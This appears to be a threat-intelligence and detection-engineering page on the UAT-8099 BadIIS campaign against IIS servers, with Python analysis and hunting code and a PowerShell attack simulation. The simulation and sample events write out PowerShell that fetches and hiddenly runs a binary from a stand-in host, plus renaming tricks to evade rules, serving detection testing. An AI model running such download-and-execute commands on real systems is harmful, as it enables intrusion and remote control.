Dissecting UAT-8099: New persistence mechanisms and regional focus
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Cisco Talos reports a fresh UAT-8099 campaign targeting vulnerable IIS web servers across Asia. The actor deploys customized BadIIS variants that include regional identifiers and relies on web shells, PowerShell, and the GotoHTTP remote control tool for follow-on control. Persistence has expanded to include creation of hidden local accounts and the use of legitimate red-team utilities to blend into administrative activity. The tradecraft overlaps with the earlier WEBJACK operation and appears focused on SEO fraud impacting sites in Thailand and Vietnam.
Investigation
Talos reviewed DNS telemetry, file hashes, and malicious scripts to reconstruct the intrusion chain. Analysts observed web shells combined with tooling such as SoftEther VPN and EasyTier, plus a set of bespoke utilities including Sharp4RemoveLog, CnCrypt Protect, OpenArk64, and GotoHTTP. Two region-tuned BadIIS strains—IISHijack and asdSearchEngine—were reverse engineered, exposing hard-coded country codes, selective request filtering, and XOR-encrypted C2 configuration. An ELF build of BadIIS with matching C2 domains was also identified on VirusTotal.
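To make the XOR step concrete, the following Python is an added example (not Talos tooling, and not derived from a real BadIIS sample): it recovers a single-byte XOR key from a configuration blob and pulls the C2 hosts out of the decrypted text. The key 0x7A is the value reported for the analysed variants; the config layout, field names and domains are constructed placeholders. It goes slightly beyond the page by brute-forcing the key instead of assuming it, which is what you need when a new variant changes the constant.

```python
"""Single-byte XOR config recovery for XOR-obfuscated configs such as the
BadIIS C2 configuration described above.

Added example. The sample blob below is CONSTRUCTED for this page: it is not
a real BadIIS sample, and every domain is a placeholder."""
import re
import string

PRINTABLE = set(bytes(string.printable, "ascii"))


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte. XOR is its own inverse, so this both
    encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def printable_ratio(buf: bytes) -> float:
    """Fraction of bytes that are printable ASCII; 1.0 for a real text config."""
    return sum(b in PRINTABLE for b in buf) / max(len(buf), 1)


def recover_single_byte_key(blob: bytes, needle: bytes = b"http") -> tuple[int, bytes]:
    """Try all 256 keys. A candidate that yields the expected C2 marker (a URL
    scheme) wins outright; otherwise rank by how much of the output is text.
    Returns (key, plaintext)."""
    best = None
    for key in range(256):
        plain = xor_bytes(blob, key)
        score = (needle in plain, printable_ratio(plain))
        if best is None or score > best[0]:
            best = (score, key, plain)
    return best[1], best[2]


URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def extract_c2_hosts(config: bytes) -> list[str]:
    """Unique hostnames from every http(s) URL in the decrypted config."""
    return sorted({m.group(1).decode() for m in URL_RE.finditer(config)})


# Constructed plaintext that only mimics the SHAPE of a C2 config: primary and
# backup C2 URLs, a country filter and an embedded HTML template.
SAMPLE_CONFIG = (
    b"c2=http://c2-one.example.invalid/api;"
    b"backup=https://c2-two.example.invalid/api;"
    b"country=TH,VN;"
    b"tpl=<html><head><title>seo</title></head></html>"
)
SAMPLE_KEY = 0x7A  # key reported for the analysed variants
SAMPLE_BLOB = xor_bytes(SAMPLE_CONFIG, SAMPLE_KEY)  # what you would carve from the binary

if __name__ == "__main__":
    key, plain = recover_single_byte_key(SAMPLE_BLOB)
    print(f"recovered key: 0x{key:02x}")
    print(plain.decode())
    print("C2 hosts:", extract_c2_hosts(plain))
```

When applying this to a real sample, carve the candidate blob from the module's data section first; a blob that is already mostly printable before decoding is a sign you have the wrong offset, not the wrong key.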
Mitigation
Patch exposed IIS vulnerabilities, strengthen web application firewall enforcement, and monitor for creation of hidden local accounts (for example, admin$, mysql$, and similar). Detect PowerShell activity that downloads or launches GotoHTTP and block outbound communication to known C2 domains. Use endpoint controls to alert on execution of the identified custom utilities and on unexpected modifications within web server directories.
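Two of the monitoring items above can be exercised offline. The Python below is an added example, not one of the listed detection rules or anything from Talos: it runs over constructed Security 4720 / 4688 and Sysmon EventID 1 records (field names mimic the real events, values are invented) and flags $-suffixed account creation and PowerShell command lines that download GotoHTTP, or that download anything and immediately start it. It assumes command-line auditing is enabled (Sysmon logs it by default; 4688 only with "Include command line in process creation events"). Matching is done on the command line rather than the image path, so a renamed binary that spawns PowerShell is still caught.

```python
"""Hunt logic for hidden local accounts and PowerShell download activity.

Added example. The event records are CONSTRUCTED and only mimic the fields of
Security 4720 (account created) / 4688 (process created) and Sysmon EventID 1."""
import re
from typing import Optional

# Computer accounts are logged under 4741, so a 4720 whose name ends in '$'
# is the hidden-account trick (admin$, mysql$, ...) rather than a machine join.
def is_hidden_account(user: str) -> bool:
    return user.endswith("$")


PS_IMAGE_RE = re.compile(r"(?i)\b(powershell|pwsh)(\.exe)?\b")
DOWNLOAD_RE = re.compile(
    r"(?i)invoke-webrequest|invoke-restmethod|\b(iwr|irm|curl|wget)\b"
    r"|downloadfile|downloadstring|start-bitstransfer|net\.webclient"
)
EXEC_RE = re.compile(r"(?i)start-process|\b(saps|iex)\b|invoke-expression|invoke-item")
GOTOHTTP_RE = re.compile(r"(?i)gotohttp")


def classify_cmdline(cmdline: str) -> Optional[str]:
    """Verdict for one process command line, or None if it is uninteresting.
    Deliberately ignores the image path: the simulation on this page renames
    the spawning binary, but 'powershell' still appears in the arguments."""
    if not PS_IMAGE_RE.search(cmdline):
        return None
    if GOTOHTTP_RE.search(cmdline) and DOWNLOAD_RE.search(cmdline):
        return "high: PowerShell downloads GotoHTTP"
    if DOWNLOAD_RE.search(cmdline) and EXEC_RE.search(cmdline):
        return "medium: PowerShell download-then-execute"
    return None


def triage(events: list[dict]) -> list[tuple[int, str, str]]:
    """Return (event_id, verdict, detail) for every record that fires."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 4720 and is_hidden_account(ev["TargetUserName"]):
            alerts.append((4720, "high: hidden local account created", ev["TargetUserName"]))
        elif ev["EventID"] in (4688, 1):
            verdict = classify_cmdline(ev["CommandLine"])
            if verdict:
                alerts.append((ev["EventID"], verdict, ev["CommandLine"]))
    return alerts


# Constructed records: two account creations, then three process creations.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "admin$", "SubjectUserName": "IUSR"},
    {"EventID": 4720, "TargetUserName": "svc_backup", "SubjectUserName": "Administrator"},
    # renamed web shell spawning PowerShell, as in the simulation below
    {"EventID": 1, "Image": r"C:\inetpub\wwwroot\bad_iis\shell_xyz.exe",
     "CommandLine": "shell_xyz.exe /c powershell.exe -NoProfile -ExecutionPolicy Bypass "
                    "-Command \"Invoke-WebRequest -Uri 'http://malicious.example.com/GotoHTTP.exe' "
                    "-OutFile 'C:\\Windows\\Temp\\svc_update.exe'; "
                    "Start-Process -FilePath 'C:\\Windows\\Temp\\svc_update.exe' -WindowStyle Hidden\""},
    # no tool name at all: still download-then-execute
    {"EventID": 4688, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -c \"iwr http://203.0.113.10/a.bin "
                    "-OutFile C:\\Windows\\Temp\\a.exe; Start-Process C:\\Windows\\Temp\\a.exe\""},
    # benign administration
    {"EventID": 4688, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Service W3SVC"},
]

if __name__ == "__main__":
    for event_id, verdict, detail in triage(SAMPLE_EVENTS):
        print(f"[{event_id}] {verdict}: {detail}")
```

The medium-severity branch is the one that survives the renaming in the simulation narrative below: once GotoHTTP is fetched under another filename, only the download-then-execute shape remains on the command line, so tune that branch against your own baseline of legitimate deployment scripts before promoting it to an alert.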
Response
If indicators are found, isolate the server, remove web shells, and delete hidden accounts. Preserve BadIIS binaries and related scripts for forensic analysis, and perform full network-traffic review to identify C2 activity. Restore from a known-good backup and re-harden IIS configuration to prevent reinfection.
Attack Flow
```mermaid
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#cccccc
    classDef malware fill:#ffcc99

    %% Node definitions
    action_exploit_public_facing["<b>Action</b> – <b>T1190 Exploit Public-Facing Application</b><br/><b>Description</b>: Exploits vulnerabilities in internet-facing applications to gain initial access.<br/><b>Details</b>: Compromised IIS servers via known vulnerabilities and deployed web shells."]
    class action_exploit_public_facing action
    tool_web_shell["<b>Tool</b> – <b>Name</b>: Web Shell<br/><b>Description</b>: Server-side script enabling remote command execution."]
    class tool_web_shell tool
    action_powershell_execution["<b>Action</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: Use PowerShell to execute commands and payloads.<br/><b>Commands</b>: whoami, tasklist, download tools."]
    class action_powershell_execution action
    tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Windows command-line shell and scripting language."]
    class tool_powershell tool
    action_system_info_discovery["<b>Action</b> – <b>T1082 System Information Discovery</b><br/><b>Description</b>: Gather OS and hardware configuration.<br/><b>Commands</b>: system info collection, user context logging."]
    class action_system_info_discovery action
    action_create_account["<b>Action</b> – <b>T1136 Create Account</b><br/><b>Description</b>: Create hidden local accounts for persistence."]
    class action_create_account action
    action_valid_accounts["<b>Action</b> – <b>T1078 Valid Accounts</b><br/><b>Description</b>: Use created accounts for ongoing access and privilege escalation."]
    class action_valid_accounts action
    action_clear_event_logs["<b>Action</b> – <b>T1070.001 Clear Windows Event Logs</b><br/><b>Description</b>: Remove logs to hide activity.<br/><b>Tool</b>: Sharp4RemoveLog utility."]
    class action_clear_event_logs action
    tool_sharp4removelog["<b>Tool</b> – <b>Name</b>: Sharp4RemoveLog<br/><b>Description</b>: Utility to erase Windows event logs."]
    class tool_sharp4removelog tool
    action_disable_event_logging["<b>Action</b> – <b>T1562.002 Disable Windows Event Logging</b><br/><b>Description</b>: Impair defenses by turning off logging."]
    class action_disable_event_logging action
    action_obfuscate_files["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Use XOR encryption (key 0x7A) to hide C2 configuration and HTML templates."]
    class action_obfuscate_files action
    malware_badiis["<b>Malware</b> – <b>Name</b>: BadIIS<br/><b>Description</b>: Variants employing XOR obfuscation."]
    class malware_badiis malware
    action_lateral_tool_transfer["<b>Action</b> – <b>T1570 Lateral Tool Transfer</b><br/><b>Description</b>: Transfer tools and files into the victim environment.<br/><b>Tools</b>: BadIIS binaries, GotoHTTP, SoftEther VPN, EasyTier."]
    class action_lateral_tool_transfer action
    tool_gotohttp["<b>Tool</b> – <b>Name</b>: GotoHTTP<br/><b>Description</b>: Remote-control tool whose sessions run over HTTP/HTTPS."]
    class tool_gotohttp tool
    tool_softether["<b>Tool</b> – <b>Name</b>: SoftEther VPN<br/><b>Description</b>: Multi-hop proxy for tunneling traffic."]
    class tool_softether tool
    tool_easytier["<b>Tool</b> – <b>Name</b>: EasyTier<br/><b>Description</b>: Multi-hop proxy for tunneling traffic."]
    class tool_easytier tool
    action_proxy_multi_hop["<b>Action</b> – <b>T1090.003 Proxy: Multi-hop Proxy</b><br/><b>Description</b>: Use proxy tools to hide the origin of traffic."]
    class action_proxy_multi_hop action
    action_web_protocol_c2["<b>Action</b> – <b>T1071.001 Web Protocols</b><br/><b>Description</b>: Communicate C2 over HTTP/HTTPS using GotoHTTP."]
    class action_web_protocol_c2 action

    %% Connections showing flow
    action_exploit_public_facing -->|uses| tool_web_shell
    tool_web_shell -->|enables| action_powershell_execution
    action_powershell_execution -->|uses| tool_powershell
    tool_powershell -->|executes| action_system_info_discovery
    action_system_info_discovery -->|leads to| action_create_account
    action_create_account -->|enables| action_valid_accounts
    action_valid_accounts -->|uses| action_clear_event_logs
    action_clear_event_logs -->|uses| tool_sharp4removelog
    action_clear_event_logs -->|also| action_disable_event_logging
    action_disable_event_logging -->|precedes| action_obfuscate_files
    action_obfuscate_files -->|implemented by| malware_badiis
    malware_badiis -->|facilitates| action_lateral_tool_transfer
    action_lateral_tool_transfer -->|transfers| tool_gotohttp
    action_lateral_tool_transfer -->|transfers| tool_softether
    action_lateral_tool_transfer -->|transfers| tool_easytier
    tool_softether -->|used for| action_proxy_multi_hop
    tool_easytier -->|used for| action_proxy_multi_hop
    action_proxy_multi_hop -->|supports| action_web_protocol_c2
    tool_gotohttp -->|used in| action_web_protocol_c2
```
Detections
- Download or Upload via Powershell (via cmdline)
- Suspicious Files in Public User Profile (via file_event)
- Possible Account or Group Enumeration (via cmdline)
- Detect PowerShell Command Execution for GotoHTTP Deployment [Windows Powershell]
- Detection of BadIIS Malware Targeting IIS Servers for SEO Fraud [Webserver]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Attack Narrative & Commands:
An attacker has gained an initial foothold on a compromised web server. They create a hidden directory called bad_iis under the IIS web root and drop a custom-named web-shell binary shell_xyz.exe (avoiding the literal string "web shell"). Through the shell they execute a PowerShell payload that downloads the GotoHTTP binary, saves it as svc_update.exe, and runs it. Because the image names are obfuscated, the original rule's Image|contains checks are bypassed, while the command line still contains "PowerShell".
Regression Test Script: This script reproduces the described steps and generates telemetry similar to the BadIIS attack without using the exact strings the rule watches for.
```powershell
# BadIIS simulation – obfuscated version
$webRoot    = "C:\inetpub\wwwroot"
$payloadDir = Join-Path $webRoot "bad_iis"
New-Item -Path $payloadDir -ItemType Directory -Force | Out-Null

# Deploy a renamed "web shell": a binary copy of a benign built-in executable.
# cmd.exe is used (rather than notepad.exe) so that the "/c ..." argument
# below is honoured and PowerShell is really spawned as a child process.
$shellSrc = Join-Path $env:SystemRoot "System32\cmd.exe"
$shellDst = Join-Path $payloadDir "shell_xyz.exe"
Copy-Item -Path $shellSrc -Destination $shellDst -Force

# Simulate the web shell invoking PowerShell to download GotoHTTP.
# The URL is a placeholder, so the download is expected to fail; the
# process-creation telemetry (the command line) is what the rules inspect.
$gotoUrl   = "http://malicious.example.com/GotoHTTP.exe"
$gotoDst   = "C:\Windows\Temp\svc_update.exe"
$psCommand = "Invoke-WebRequest -Uri '$gotoUrl' -OutFile '$gotoDst'; Start-Process -FilePath '$gotoDst' -WindowStyle Hidden"

# Execute the PowerShell payload via the renamed web shell (process creation).
# The inner quotes are escaped so the whole -Command value reaches
# powershell.exe as a single argument.
$shellArgs = "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `"$psCommand`""
Start-Process -FilePath $shellDst -ArgumentList $shellArgs -WindowStyle Hidden

Write-Output "BadIIS simulation executed."
```
Cleanup Commands: Removes the planted artifacts and restores the environment.
```powershell
# Cleanup BadIIS simulation artifacts
$webRoot    = "C:\inetpub\wwwroot"
$payloadDir = Join-Path $webRoot "bad_iis"
Remove-Item -Path $payloadDir -Recurse -Force -ErrorAction SilentlyContinue

$gotoDst = "C:\Windows\Temp\svc_update.exe"
Remove-Item -Path $gotoDst -Force -ErrorAction SilentlyContinue

Write-Output "Cleanup completed."
```